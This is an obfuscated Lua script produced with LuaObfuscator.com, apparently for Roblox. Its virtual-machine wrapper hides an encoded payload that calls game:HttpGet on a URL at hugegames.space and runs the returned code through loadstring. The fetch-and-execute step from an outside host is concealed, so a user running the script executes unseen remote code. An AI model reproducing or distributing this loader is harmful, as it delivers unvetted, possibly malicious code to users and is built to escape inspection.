--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -(880 -(282 + 595)))^(v32-(2 -1))))%(2^(((v33-(1 -(1637 -(1523 + 114)))) -(v32-(2 -1))) + (620 -(555 + 58 + 6)))) ;return v82-(v82%(932 -(857 + 74))) ;else local v83=(570 -(367 + 201))^(v32-((1322 -394) -((1279 -(68 + 997)) + 713))) ;return (((v31%(v83 + v83))>=v83) and (1 + 0)) or (0 + (1270 -(226 + 1044))) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=(0 -0) -(350 -(87 + 263)) ;local v36;local v37;while true do if (v35==(118 -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 + (180 -(67 + 113)))) then v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;v35=1 -0 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) + 0 );v18=v18 + (9 -5) ;return (v41 * (12338840 + 4438376)) + (v40 * (260471 -194935)) + (v39 * ((2191 -983) -(802 + 150))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,1 + 0 ,(1095 -(1020 + 60)) + 5 ) * ((999 -(915 + (1505 -(630 + 793))))^((1592 -1122) -(145 + 293)))) + v42 ;local v46=v20(v43,59 -38 ,19 + 12 );local v47=((v20(v43,41 -9 )==(1188 -(1069 + 118))) and  -(773 -(201 + 571))) or (2 -1) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=3 -(9 -7) ;v44=0 -0 ;end elseif (v46==(2031 + 16)) then return ((v45==(791 -(145 + 223 + (1456 -1033)))) and (v47 * ((3 -2)/(18 -(10 + 8))))) or (v47 * NaN) ;end return v8(v47,v46-(3934 -2911) ) * (v44 + (v45/((887 -((2008 -(760 + 987)) + 624))^(494 -(416 + 26))))) ;end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(1916 -(1789 + 124))) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==(766 -((3279 -2534) + 21))) then return "";end end v49=1;end if (v49==(1 + 1)) then v51={};for v89=2 -(1 + 0) , #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=11 -8 ;end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=1057 -(87 + 968) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=1001 -(938 + 63) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((5 -2)~=v52) then else local v86=0 + 0 ;while true do if (v86==(0 + 0)) then v59=nil;v60=nil;v86=1 + 0 ;end if (v86==(1 + 0)) then v52=533 -(406 + 123) ;break;end end end if (v52~=(1617 -(1565 + 48))) then else while true do if (v53==3) then v60=nil;while true do local v98=1769 -(1749 + 20) ;local v99;local v100;while true do if (v98==1) then while true do if (v99==0) then v100=0;while true do if (v100==(0 + 0)) then local v140=0 + 0 ;while true do if ((1322 -(1249 + 73))~=v140) then else if ((1 + 1)==v54) then local v144=1145 -(466 + 679) ;local v145;while true do if (v144==(0 -0)) then v145=0 -0 ;while true do if (v145==(2 -1)) then for v153=1901 -(106 + 1794) ,v23() do local v154=0;local v155;local v156;while true do if ((1 + 0)~=v154) then else while true do if (v155~=0) then else v156=v21();if (v20(v156,1 + 0 ,1 + 0 )==(0 -0)) then local v164=0 -0 ;local v165;local v166;local v167;local v168;local v169;local v170;while true do if (v164==2) then v169=nil;v170=nil;v164=3;end if (0==v164) then v165=1018 -(697 + 321) ;v166=nil;v164=115 -(4 + 110) ;end if (v164==(587 -(57 + 527))) then while true do if ((0 -0)==v165) then local v175=0 -0 ;while true do if (v175==1) then v165=1;break;end if ((1427 -(41 + 1386))~=v175) then else v166=103 -(17 + 86) ;v167=nil;v175=2 -1 ;end end end if (v165==(1229 -(322 + 905))) then v170=nil;while true do if (v166~=(1 + 0)) then else local v177=0;while true do if (v177~=(0 -0)) then else local v179=0;while true do if (v179==(2 -1)) then v177=948 -(245 + 702) ;break;end if ((166 -(122 + 44))~=v179) then else v169=nil;v170=nil;v179=3 -2 ;end end end if (v177~=(1 -0)) then else v166=2;break;end end end if (v166~=(1900 -(260 + 1638))) then else while true do if (2==v167) then local v180=0;local v181;local v182;while true do if (v180==1) then while true do if (v181==(0 -0)) then v182=0 + 0 ;while true do if (v182==1) then v167=1 + 2 ;break;end if (v182==0) then if (v20(v169,3 -2 ,1)~=(1 -0)) then else v170[67 -(30 + 35) ]=v60[v170[2 + 0 ]];end if (v20(v169,1259 -(1043 + 214) ,1207 -(902 + 303) )==(3 -2)) then v170[1215 -(323 + 889) ]=v60[v170[7 -4 ]];end v182=581 -(361 + 219) ;end end break;end end break;end if (v180~=(320 -(53 + 267))) then else v181=0;v182=nil;v180=1 + 0 ;end end end if ((416 -(15 + 398))==v167) then if (v20(v169,217 -(22 + 192) ,985 -(18 + 964) )==(3 -2)) then v170[3 + 1 ]=v60[v170[4]];end v55[v153]=v170;break;end if (v167~=(1 + 0)) then else local v184=0;local v185;while true do if (v184~=0) then else v185=0;while true do if (v185==(0 -0)) then local v189=0 -0 ;while true do if (v189==(765 -(468 + 297))) then v170={v22(),v22(),nil,nil};if (v168==(0 -0)) then local v194=0;local v195;local v196;while true do if (v194~=1) then else while true do if ((0 -0)==v195) then v196=0 + 0 ;while true do if (v196==(236 -(141 + 95))) then v170[741 -(542 + 196) ]=v22();v170[4]=v22();break;end end break;end end break;end if (v194==(0 + 0)) then v195=0 -0 ;v196=nil;v194=2 -1 ;end end elseif (v168==1) then v170[1 + 2 ]=v23();elseif (v168==(1 + 1)) then v170[8 -5 ]=v23() -((2 + 0)^16) ;elseif (v168~=(2 + 1)) then else local v199=0 + 0 ;local v200;while true do if (v199==(0 -0)) then v200=0 + 0 ;while true do if (v200==(0 -0)) then v170[1554 -(1126 + 425) ]=v23() -((407 -(118 + 287))^(8 + 8)) ;v170[15 -11 ]=v22();break;end end break;end end end v189=766 -(574 + 191) ;end if (v189~=1) then else v185=1 + 0 ;break;end end end if (v185~=1) then else v167=4 -2 ;break;end end break;end end end if (v167~=0) then else local v186=0 + 0 ;while true do if (1==v186) then v167=1122 -(118 + 1003) ;break;end if (v186==(0 -0)) then v168=v20(v156,851 -(254 + 595) ,129 -(55 + 71) );v169=v20(v156,381 -(142 + 235) ,27 -21 );v186=1791 -(573 + 1217) ;end end end end break;end if (v166~=(0 + 0)) then else local v178=0;while true do if (v178==0) then v167=977 -(553 + 424) ;v168=nil;v178=1 -0 ;end if (v178~=(1 + 0)) then else v166=2 -1 ;break;end end end end break;end if (1==v165) then local v176=0 + 0 ;while true do if (v176~=(0 -0)) then else v168=nil;v169=nil;v176=1 + 0 ;end if (v176==(2 -1)) then v165=2;break;end end end end break;end if (v164==(1 + 0)) then v167=nil;v168=nil;v164=2 + 0 ;end end end break;end end break;end if ((0 + 0)~=v154) then else v155=0 -0 ;v156=nil;v154=2 -1 ;end end end v54=51 -(25 + 23) ;break;end if (v145==(0 + 0)) then local v151=0 -0 ;local v152;while true do if (v151~=0) then else v152=0 + 0 ;while true do if (v152==(4 -3)) then v145=1;break;end if (v152~=(753 -(239 + 514))) then else for v160=1 + 0 ,v59 do local v161=0;local v162;local v163;while true do if (v161~=1) then else if (v162==(1330 -(797 + 532))) then v163=v21()~=(0 -0) ;elseif (v162==2) then v163=v24();elseif (v162==(3 + 0)) then v163=v25();end v60[v160]=v163;break;end if (v161==0) then v162=v21();v163=nil;v161=1 + 0 ;end end end v58[6 -3 ]=v21();v152=1 -0 ;end end break;end end end end break;end end end if (v54==(100 -(11 + 86))) then local v146=0;local v147;local v148;while true do if (v146==(0 -0)) then v147=0;v148=nil;v146=1203 -(373 + 829) ;end if (v146==(732 -(476 + 255))) then while true do if (v147~=0) then else v148=0;while true do if (v148==0) then local v157=0;local v158;while true do if (v157~=(1130 -(369 + 761))) then else v158=0 -0 ;while true do if ((1796 -(503 + 1293))==v158) then local v171=0 + 0 ;while true do if (v171==(0 -0)) then for v173=1,v23() do v56[v173-1 ]=v28();end return v58;end end end end break;end end end end break;end end break;end end end v140=1 -0 ;end if ((239 -(64 + 174))==v140) then v100=1 + 0 ;break;end end end if (v100==(1062 -(810 + 251))) then if (v54==(0 -0)) then local v141=0;while true do if (v141~=(337 -(144 + 192))) then else v57={};v54=1 + 0 ;break;end if (0==v141) then local v149=216 -(42 + 174) ;while true do if (v149~=(0 + 0)) then else v55={};v56={};v149=1 + 0 ;end if (v149==1) then v141=1;break;end end end end end if (v54==(534 -(43 + 490))) then local v142=0;local v143;while true do if (v142~=0) then else v143=733 -(711 + 22) ;while true do if (v143==(1 + 0)) then v60={};v54=2 + 0 ;break;end if ((0 + 0)~=v143) then else local v150=0;while true do if (v150==(1505 -(363 + 1141))) then v143=1581 -(1183 + 397) ;break;end if (v150==0) then v58={v55,v56,nil,v57};v59=v23();v150=1 -0 ;end end end end break;end end end break;end end break;end end break;end if (v98==(0 + 0)) then v99=0 -0 ;v100=nil;v98=1 + 0 ;end end end break;end if (v53~=(0 + 0)) then else v54=0 + 0 ;v55=nil;v53=1976 -(1913 + 62) ;end if (v53==(8 -6)) then local v97=0 + 0 ;while true do if (v97==(3 -2)) then v53=1742 -(404 + 1335) ;break;end if (v97~=(406 -(183 + 223))) then else local v101=0 -0 ;while true do if (v101==(1933 -(565 + 1368))) then v58=nil;v59=nil;v101=1;end if (v101==1) then v97=3 -2 ;break;end end end end end if (v53==(1662 -(1477 + 184))) then v56=nil;v57=nil;v53=2 -0 ;end end break;end if (v52==(0 + 0)) then local v87=0;while true do if (v87~=(856 -(564 + 292))) then else v53=0 -0 ;v54=nil;v87=2 -1 ;end if (v87~=(305 -(244 + 60))) then else v52=339 -(118 + 220) ;break;end end end if (v52==1) then v55=nil;v56=nil;v52=2 + 0 ;end if ((1 + 1)~=v52) then else v57=nil;v58=nil;v52=479 -(41 + 435) ;end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v85=0;while true do if (v85==0) then v79=v67[v71];v80=v79[1];v85=1;end if (v85==1) then if (v80<=3) then if (v80<=1) then if (v80>0) then local v102;local v103,v104;local v105;local v106;v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v106=v79[2];v105=v77[v79[3]];v77[v106 + 1 ]=v105;v77[v106]=v105[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v106=v79[2];v103,v104=v70(v77[v106](v13(v77,v106 + 1 ,v79[3])));v72=(v104 + v106) -1 ;v102=0;for v131=v106,v72 do local v132=0;while true do if (v132==0) then v102=v102 + 1 ;v77[v131]=v103[v102];break;end end end v71=v71 + 1 ;v79=v67[v71];v106=v79[2];v77[v106]=v77[v106](v13(v77,v106 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];do return;end else local v116=v79[2];local v117=v77[v79[3]];v77[v116 + 1 ]=v117;v77[v116]=v117[v79[4]];end elseif (v80==2) then local v121=0;local v122;while true do if (v121==0) then v122=v79[2];v77[v122]=v77[v122](v13(v77,v122 + 1 ,v72));break;end end else v77[v79[2]]();end elseif (v80<=5) then if (v80>4) then v77[v79[2]]=v63[v79[3]];else v77[v79[2]]=v79[3];end elseif (v80==6) then do return;end else local v127=v79[2];local v128,v129=v70(v77[v127](v13(v77,v127 + 1 ,v79[3])));v72=(v129 + v127) -1 ;local v130=0;for v133=v127,v72 do v130=v130 + 1 ;v77[v133]=v128[v130];end end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403343O00682O7470733A2O2F6875676567616D65732E73706163652F6137346665393331613337356535393236326337363431622E6C756100083O0012013O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
